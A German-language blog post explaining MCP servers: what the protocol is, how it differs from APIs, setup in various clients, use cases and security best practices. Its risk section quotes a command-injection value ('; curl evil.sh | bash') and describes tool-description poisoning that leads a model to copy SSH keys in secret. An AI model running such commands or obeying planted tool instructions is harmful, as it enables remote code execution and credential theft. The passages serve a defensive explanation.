27. Mai 17:00: n8n-WorkshopSo entwickelst AI Agents mit n8n
AI Discovery Workshopmehr erfahren
Product StudioTrainingCommunity
Sprich mit uns
Zu allen Blog Posts

Was sind MCP Server? - Model Context Protocol erklärt

Was sind MCP Server? Schnittstelle zwischen LLMs und Tools
No-Code & KI
-
Veröffentlicht am
17.6.2025
-
Jonathan Kemper
-
7
8 Minuten
Lesezeit

Erinnerst du dich an den Moment, als USB‑C das Kabel‑Chaos beseitigte? Egal ob Festplatte, Monitor oder Smartphone: Ein Stecker reicht heutzutage. Seit Ende 2024 erlebt die KI‑Welt denselben Aha‑Effekt auf Daten‑ und Tool‑Ebene: Das „Model Context Protocol“ (MCP) liefert den universellen Anschluss, über den KI-Sprachmodelle strukturierte Informationen aus anderen Tools abrufen und dadurch Aktionen ausführen können.

Bevor MCP erschien, schrieb jedes Team für jede Datenquelle eigene Skripte und verknüpfte sie mühsam mit einem LLM. Heute erledigen wir den Job einmal nach den Vorgaben des Protokolls, und jedes Modell kann loslegen. In diesem Beitrag erfährst du, warum wir MCP‑Server brauchen, wie sie arbeiten, wo sie schon heute helfen aber auch, welchen Risiken du dir bewusst sein solltest.

Was heißt MCP und woher kommt der Begriff? 

„MCP“ steht für „Model Context Protocol“. Ein sogenannter MCP‑Server funktioniert als Dolmetscher zwischen einem großen Sprachmodell (LLM) und den Programmen, Datenbanken und Diensten deines Tech‑Stacks - z.B. HubSpot oder Notion.

Seinen Ursprung hat das Protokoll bei Anthropic, die am 25. November 2024 eine erste Referenz­implementierung quelloffen auf GitHub veröffentlichten. Nur wenige Monate später integrierten OpenAI, Google und Microsoft (Azure AI Foundry) MCP in ihre Agent‑Frameworks. Ein MCP‑Server versorgt das Sprachmodell mit strukturiertem Kontext und übersetzt dessen Antworten in konkrete Befehle. Statt bloß Text hin‑ und herzuschieben, sagt das Modell nun create_branch, start_vm oder send_invoice, und der Server führt den Auftrag im passenden System aus.

Beispiel - dein Online Shop

Nehmen wir an, du hast ein Online Shop. Dort kannst du im Backend definieren, welche Befehle dein Shop‑Backend akzeptiert (z.B. get_order, create_client etc.). Jetzt kann jede MCP‑fähige KI Bestellungen anlegen, Lieferungen anpassen oder Rechnungen verschicken, ohne dass du eine einzige Zeile SDK‑Code nachziehen musst. Entwickelst du später ein neues Modell oder wechselst du den Cloud‑Anbieter, bleibt die Schnittstelle unverändert. Der Server spricht weiter dieselbe „Sprache“ und schützt dich vor Bruchstellen.

Dass wir eine solche Ebene bisher nicht brauchten, lag schlicht daran, dass Sprachmodelle lange nur Texte erzeugten. Erst als Agent‑Konzepte populär wurden, stiegen die Erwartungen: Wenn das Modell schon weiß, was zu tun ist, warum klickt noch ein Mensch? MCP schließt diese Lücke. Dank der MCP Server kann eine KI jetzt auch in externen Tools Aktionen ausführen. Gleichzeitig behältst du die Kontrolle, denn das Manifest legt fest, welche Befehle erlaubt sind, welche Parameter gültig bleiben und wann das Modell Rückfragen stellt. 

Analogie aus dem echten Leben

Stell dir vor, du hast einen persönlichen Assistenten, der die "Sprache" verschiedener Institutionen spricht - Finanzamt, Steuerberater, Banken. Er kennt die Telefonnummern, die Ansprechpartner:innen und deine Informationen. Statt dass du dich mit jeder einzelnen Institution auseinandersetzen musst, kann das dein Assistent für dich erledigen.

Die Institutionen hierbei sind deine externen Tools (HubSpot, Xano, Notion etc.). Haben diese Tools einen MCP Server, kann jede MCP-fähige KI mit ihnen kommunizieren, ohne, dass du der KI die API Dokumentationen von jedem Tool "beibringen" musst.

MCP vs. API: Unterschiede und Ähnlichkeiten

Vielleicht fragst du dich: „Ist MCP einfach eine REST-API?“ Eine API, ausgeschrieben „Application Programming Interface“, definiert präzise Pfade: GET /contacts/1242 liefert die Daten von Kundin mit der ID 1242, POST /orders legt eine neue Bestellung an. Sie ist ein direkter Kommunikationskanal für Entwickler:innen und transportiert ausschließlich Rohdaten. Ein MCP-Server geht weiter, denn er erklärt dem Sprachmodell, wann und warum diese Daten wichtig sind, bietet das passende Werkzeug an und bindet das Ergebnis sofort in die Antwort des Modells ein.

Beide Ansätze bewegen Daten von einem System zum anderen und nutzen dafür oft dieselben Endpunkte. Ein MCP-Server ruft also dieselbe Route auf, extrahiert die Antwort und arbeitet damit weiter. Damit enden die Gemeinsamkeiten.

Eine API stellt einzelne Funktionen bereit, ohne sich um ihren Kontext zu kümmern. Der MCP-Server liefert dem Sprachmodell hingegen nicht nur Rohdaten, sondern ordnet sie ein, versieht sie mit Parametern und legt fest, welche Schritte anschließend möglich sind. Sein Manifest beschreibt, welche Werkzeuge das Modell aufrufen darf, welche Eingaben gültig sind und wann es nachfragen soll.

Angenommen, dein Shop-Backend bietet GET /orders/123 an. Der MCP-Server zieht diese Bestellung, formt daraus ein Kontextdokument und schickt es an das Modell. Fragt die Kundin: „Kannst du meine Lieferung auf Express umstellen?“, erkennt das Modell, dass es um Bestellung 123 geht, wählt das Tool update_shipment und übergibt die Parameter für Expressversand. Der Server ruft daraufhin POST /shipments/express auf, prüft die Antwort und formuliert für die Kundin eine verständliche Bestätigung. Die REST-API bleibt der stabile Datenlieferant, der MCP-Server sorgt dafür, dass das Sprachmodell die Information begreift und in einem Zug die gewünschte Aktion ausführt.

Model Context Protocol Beispiel
Aus einem Textbefehl kann eine KI dank MCP mehrere API Calls gleichzeitig machen, da sie den Kontext versteht.

Wie nutzt du MCP? Und wie solltest du sie nutzen? 

Ein MCP-Server verleiht deiner KI zwei grundlegende Fähigkeiten: handeln und verstehen. Zunächst kann der Agent eigenständig E-Mails versenden, Datenbankeinträge aktualisieren oder ein Google-Doc anlegen, ganz ohne zusätzliche Skripte. Gleichzeitig verbindet der Server das Sprachmodell mit deinem Tech-Stack, damit CRM-Daten, ERP-Buchungen oder Confluence-Artikel als strukturierter Kontext einfließen. So entstehen Antworten, die fachlich korrekt sind und bei Bedarf direkt ins System zurückgeschrieben werden. Teile nur die Werkzeuge, die wirklich nötig sind, validiere jede Eingabe sorgfältig und protokolliere sämtliche Aktionen transparent. Auf diese Weise laufen Automatisierung und Governance harmonisch zusammen, während du jederzeit den Überblick behältst.

Wie und wo kannst du einen MCP-Server aufsetzen? 

Ein MCP-System besteht immer aus einem Server, der Werkzeuge anbietet, und einem Client, der diese Werkzeuge nutzt. Einer der ersten und beliebtesten Clients ist Claude Desktop, der von Anthropic, also den Erfinder:innen des MCP angeboten wird. Da er als lokales Programm auf deinem Windows- oder macOS-Computer läuft, kann er auch mit lokalen Umgebungen interagieren, etwa dem Dateisystem. Öffne dafür „Datei → Einstellungen → Entwickler → Konfiguration bearbeiten“, füge das Quick-Start-Snippet für deinen gewünschten Server ein und speichere. Nach dem App-Neustart erscheint unter dem Eingabefeld ein Werkzeug-Symbol; Befehle wie „erstelle Ordner Berichte 2025“ werden jetzt direkt als Tool-Aufruf ausgeführt. Schon mit lokalen MCP-Setups ergeben sich spannende Möglichkeiten und du kannst Ideen mit Programmen umsetzen, die du noch nie bedient hast, zum Beispiel mit dem 3D-Modellierer Blender

Alternativ kannst du auch über SSE Remote-Server anbinden. Möchtest du einen gehosteten Server anbinden, hinterlegst du dessen URL in derselben Ansicht oder per Kommando claude mcp add --transport sse …. SSE (Server-Sent Events) nutzt dabei eine einfache, dauerhaft geöffnete HTTP-Verbindung, über die der Server seine Antwort sofort an den Client schickt. Solche Server findest du in verschiedenen Verzeichnissen, etwa auf mcp.so. Hier sind inzwischen mehr als 15.000 Server gelistet, filterbar nach Kategorie und Popularität mcp.so. Etwas kuratierter geht es bei mcpservers.org zu. 

Für Web-UIs wie ChatGPT, Gemini oder Perplexity steht das Chrome-Plugin MCP SuperAssistant zur Verfügung. Nach der Installation startest du einen kleinen lokalen Proxy-Server mit npx @srbhptl39/mcp-superassistant-proxy@latest --config ./mcpconfig.json. Schaltest du den MCP-Knopf im Plugin ein, zeigt eine Sidebar alle verfügbaren Tools; du kannst auswählen, ob Aufrufe automatisch laufen oder manuell bestätigt werden sollen.

Wer lieber nur im Browser arbeitet, probiert vielleicht mal Runner H aus. Im Menü „MCPS“ verbindest du per OAuth-Login in wenigen Klicks Google-Dienste, Notion, Slack oder Zapier-Aktionen – die Auswahl verfügbarer Services ist aber leider noch ziemlich überschaubar. Im Chat reicht @tool: gefolgt von deiner Aufgabe, etwa eine neue Zeile in Google Sheets, und Runner H führt den Auftrag aus und protokolliert das Ergebnis. 

Auch Entwicklungsumgebungen bringen MCP-Support inzwischen mit. In Cursor IDE legst du projektbezogene Server unter „MCP Servers“ an, in Windsurf findest du die gleiche Funktion in den Einstellungen. So können Agenten Tests starten, Logs auslesen oder Deploy-Aufgaben anstoßen, während du weiter am Code arbeitest.

Vorhandene Automationen kannst du auch über die MCP-Server von Make oder Zapier einbinden. Make verwandelt jedes „On Demand“-Szenario in ein MCP-Tool, das dein Client über eine von Make bereitgestellte SSE-URL anspricht. Zapier erstellt nach einem Klick eine eigene Endpoint-URL und öffnet damit den Zugang zu vielen tausend Apps, ohne dass weitere Integrationsarbeit nötig ist.

4 Einsatzszenarien, die schon heute laufen

  • Webflow: Der offizielle MCP-Server gibt deinem Agenten Live-Zugriff auf Sites, Collections und CMS-Felder. Damit lassen sich neue Blogposts anlegen, SEO-Titel nachziehen oder Releases auslösen, ohne dass du eigene Integrationsskripte warten musst.
  • Wix Studio: Der gehostete Server deckt eCommerce, Bookings, Payments, Blog, CMS und CRM ab. Nach einmaligem OAuth-Setup kann eine KI Produkte aktualisieren, Preise anpassen oder Events erstellen und bleibt dabei in der sicheren Wix-Cloud.
  • Figma Dev Mode: Aktivierst du den lokalen MCP-Server, liefert Figma Variablen, Komponenten-IDs und Layout-Maße direkt an deinen Code-Agenten. So entsteht sauberer React- oder Tailwind-Code, der Design-System-Vorgaben automatisch einhält.
  • Airtable: Das Open-Source-Projekt airtable-mcp-server stellt Tools wie list_records, search_records und create_record bereit. Ein Personal Access Token genügt, damit der Agent Tabellen durchsucht, Reports generiert oder neue Datensätze anlegt.

Welche Gefahren können MCP-Server bergen? 

Wo Daten fließen, lauern Risiken – und MCP-Server sind ein besonders verlockendes Ziel, weil sie zwischen Modellen und Unternehmenssystemen stehen. Gelangt jemand an dein Zugriffstoken, steuert er oder sie jedes angebundene Tool. Sicherheitsforscher:innen fanden in über vierzig Prozent der geprüften Implementierungen unsichere Shell-Aufrufe; ein scheinbar harmloser Parameter wie ; curl evil.sh | bash genügt dann für Remote-Code-Ausführung. Ein anderes Forschungsteam zeigte außerdem, wie sich Befehle im Beschreibungstext eines Tools verstecken lassen: Das Modell liest die verdeckte Instruktion, kopiert heimlich SSH-Schlüssel und niemand bemerkt den Diebstahl. Selbst nach der Installation bleibt Gefahr, denn Tools können ihre eigene Definition verändern und später Anfragen unbemerkt an einen fremden Server leiten. In Umgebungen mit mehreren Servern kann ein manipuliertes Exemplar die Aufrufe eines vertrauenswürdigen abfangen und die Antworten verfälschen.

Auch ohne aktiven Angriff drohen Lecks, wenn der Server Kontextpakete unverschlüsselt überträgt oder in Klartext protokolliert. Kund:innen- oder Gesundheitsdaten dürfen weder in Logs noch in Prompt-Verläufen erscheinen. Zusätzlich erfinden große Sprachmodelle gern Funktionen; verlangt das Modell plötzlich delete_database, muss der Server blockieren und Alarm auslösen.

Diese Schwachstellen entstehen, weil die Spezifikation Komfort über Sicherheit stellt. Sie schreibt weder Authentifizierung noch Verschlüsselung oder Integritätsnachweise vor. Microsoft reagiert mit einer kuratierten Registry, verlangt strenge Anmeldung und zeigt bei riskanten Aktionen Zustimmungsprompts. Anthropic empfiehlt, jedes Modell als untrusted zu behandeln, als käme jeder Prompt von einer anonymen Internetperson.

Best Practices für deinen MCP Einsatz

  • Feingranulare Berechtigungen (Least Privilege Principle): Gewähre dem MCP-Server und jedem Tool nur die Rechte, die aktuell zwingend nötig sind. Schreib- oder Admin-Scopes laufen automatisch ab, damit überflüssige Zugriffe nicht zum Einfallstor werden.
  • Authentifizierung und Autorisierung: Schütze alle Endpunkte mit Mehrfaktor-Anmeldung; Tokens sind kurzlebig, streng begrenzt und werden bei Auffälligkeiten sofort rotiert. Ein gestohlenes Token wird so wertlos, bevor Schaden entsteht.
  • Überwachung und Auditing: Erfasse sämtliche Interaktionen verschlüsselt und analysiere sie in Echtzeit. Alarme bei Anomalien – zum Beispiel massenhaftem update_record in Sekunden – stoppen Angriffe frühzeitig.
  • Prompt Engineering und Guardrails: Definiere im Manifest klar, welche Befehle zulässig sind, und zwinge das Modell bei Unklarheiten zur Rückfrage. Guardrails blockieren halluzinierte oder injizierte Aufrufe wie delete_database.
  • Fehlerbehandlung: Implementiere Routinen, die unerreichbare Tools oder fehlerhafte Antworten erkennen, den Vorfall protokollieren und den Workflow kontrolliert abbrechen. So bleiben Abläufe transparent und wiederherstellbar.
  • Dokumentation und Versionierung: Lege jedes Manifest in der Versionskontrolle ab und unterziehe Änderungen einem Peer-Review. Eine präzise Doku beschreibt erwartete Eingaben, Ausgaben und Sicherheitsregeln, damit alle Team­mitglieder den Einsatz nachvollziehen können.

Fazit

MCP bringt Ordnung in die bisherigen Integrations-Insellösungen. Ein einziges Manifest beschreibt, welche Werkzeuge ein Modell verwenden darf, und ein Server stellt sie in strukturierter Form bereit. So entfällt der Wartungsaufwand für dutzende Spezialskripte, während Berechtigungen klar und prüfbar bleiben. Diese Vereinfachung kommt allerdings nicht ohne Aufwand. Wer einen MCP-Server produktiv einsetzen will, muss das Manifest sauber modellieren, den Server gegen unbefugten Zugriff absichern, alle Aufrufe lückenlos protokollieren und sensible Log-Daten verschlüsselt vorhalten.

Dieser Aufwand lohnt sich, weil das Protokoll schnell an Akzeptanz gewinnt. Große Anbieter wie Anthropic, Google, Microsoft und diverse Entwickler-Tools haben MCP bereits integriert oder angekündigt, weitere dürften folgen. Wer jetzt erste Pilotprojekte startet, baut Know-how auf, wenn sich der Standard gerade etabliert, und verschafft sich damit einen realen Vorsprung.

Entscheidend bleibt ein konsequenter Datenschutz. Übertrage vertrauliche Informationen nur, sofern sie für die Aufgabe unerlässlich sind, halte Tokens auf den kleinstmöglichen Funktionsumfang beschränkt und lösche oder anonymisiere Protokolle innerhalb klar definierter Fristen. Gelingt dieser verantwortungsvolle Umgang, liefert MCP eine belastbare Grundlage, um KI-Automatisierung sicher in den Arbeitsalltag zu bringen und dabei jede Handlung nachvollziehbar zu halten.

Inhaltsverzeichnis

Heading 2
Heading 3
Heading 4
Heading 5
Heading 6

Das könnte dir auch gefallen

dark blue image with AI and workflow visualization
No-Code & KI
Lesezeit:
5
Min.
KI-Agenten vs. Workflows – was ist der Unterschied?
jonathan profilbild
Jonathan Kemper
5.6.2025
 
No-Code + AI vs. Code + AI: Ein Vergleich Titelbild
No-Code & KI
Lesezeit:
12
Min.
No-Code + AI vs. klassischer Code + AI: Ein Vergleich
jonathan profilbild
Jonathan Kemper
2.6.2025
 
No-Code & KI
Lesezeit:
10
Min.
No-Code und KI: Ist das die Zukunft der App-Entwicklung?
jonathan profilbild
Jonathan Kemper
25.3.2025
 
Was wir anbieten
Product Studio
Bisherige Projekte
Training
Community
Kontaktiere uns
Über Uns
Mission & Vision
Unser Team
Bewirb dich bei uns
Ressourcen
No-Code Navigator
Podcast
Tool Directory
Blog
Glossar
Ressourcen zum Download
Soziale Medien
LinkedIn
YouTube
TikTok
Instagram
© 2025 VisualMakers. All rights reserved.
DatenschutzerklärungAGBsImpressum
Cookies